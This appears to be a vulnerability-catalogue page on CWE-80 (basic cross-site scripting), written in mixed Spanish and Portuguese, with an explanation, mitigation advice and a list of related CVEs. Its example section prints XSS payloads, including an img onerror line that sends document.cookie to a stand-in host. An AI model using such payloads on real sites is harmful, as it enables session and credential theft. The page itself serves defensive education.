Fallos del tipo CWE-80

586 resultados

Falta de neutralização de tags HTML relacionadas a scripts (XSS básico)

Quando uma aplicação web recebe dados do usuário e os insere diretamente no HTML da página sem sanitização ou escapamento, um atacante consegue injetar tags e scripts maliciosos que executam no navegador de outros usuários. É um dos tipos mais comuns de XSS (Cross-Site Scripting) e permite roubo de sessão, credenciais ou redirecionamento para sites maliciosos.

Ejemplo

Um formulário de busca que mostra o termo pesquisado na página sem validação: se o usuário entra <script>alert('xss')</script>, o script executa. Ou um campo de comentário que exibe <img src=x onerror='fetch(malicious.com?cookie='+document.cookie+')'>, roubando o cookie da sessão.

Cómo mitigar

Sempre escapar/encodar saídas HTML (ex: converter < para &lt;, > para &gt;), usar Content Security Policy (CSP) nos headers HTTP, e validar/sanitizar entrada no servidor. Em JavaScript, prefira textContent no lugar de innerHTML quando possível; em frameworks, use templating seguro (React, Vue escapam por padrão).

CVE-2021-27915HIGHXSS Cross-site Scripting Stored (XSS) - Description fieldEPSS 0.6%CVE-2023-33194LOWCraftCMS stored XSS in Quick Post widget error messageEPSS 0.6%CVE-2008-10001MEDIUMPro2col Stingray FTS cross site scritingEPSS 0.6%CVE-2017-20140MEDIUMItech Movie Portal Script movie.php Reflected cross site scriptingEPSS 0.6%CVE-2020-2498Cross-site scripting vulnerability in QTS and QuTS heroEPSS 0.6%CVE-2025-25299LOWCross-site scripting (XSS) in the real-time collaboration packageEPSS 0.6%CVE-2017-20036LOWPHPList Bounce Rule Persistent cross site scritingEPSS 0.6%CVE-2017-20035LOWPHPList Subscribe Persistent cross site scritingEPSS 0.6%CVE-2017-20034LOWPHPList List Name Persistent cross site scritingEPSS 0.6%CVE-2017-20094LOWNewStatPress Plugin Persistent cross site scritingEPSS 0.6%CVE-2022-20654MEDIUMCisco Webex Meetings Cross-Site Scripting VulnerabilityEPSS 0.6%CVE-2024-52598HIGH2FAuth vulnerable to Server Side Request Forgery + URI validation bypass in 2fauth /api/v1/twofaccounts/previewEPSS 0.6%CVE-2018-25035LOWThomson TCW710 RGFirewallEL Persistent cross site scritingEPSS 0.6%CVE-2018-25038LOWThomson TCW710 RgDhcp Persistent cross site scritingEPSS 0.6%CVE-2018-25037LOWThomson TCW710 RgDdns Persistent cross site scritingEPSS 0.6%CVE-2018-25036LOWThomson TCW710 RgTime Persistent cross site scritingEPSS 0.6%CVE-2024-32489MEDIUMTCPDF before 6.7.4 mishandles calls that use HTML syntax.EPSS 0.6%CVE-2017-20057MEDIUMElefant CMS Persistent cross site scritingEPSS 0.6%CVE-2020-36196Stored XSS Vulnerability in QuLog CenterEPSS 0.6%CVE-2020-36544LOWSialWeb CMS Search cross site scritingEPSS 0.6%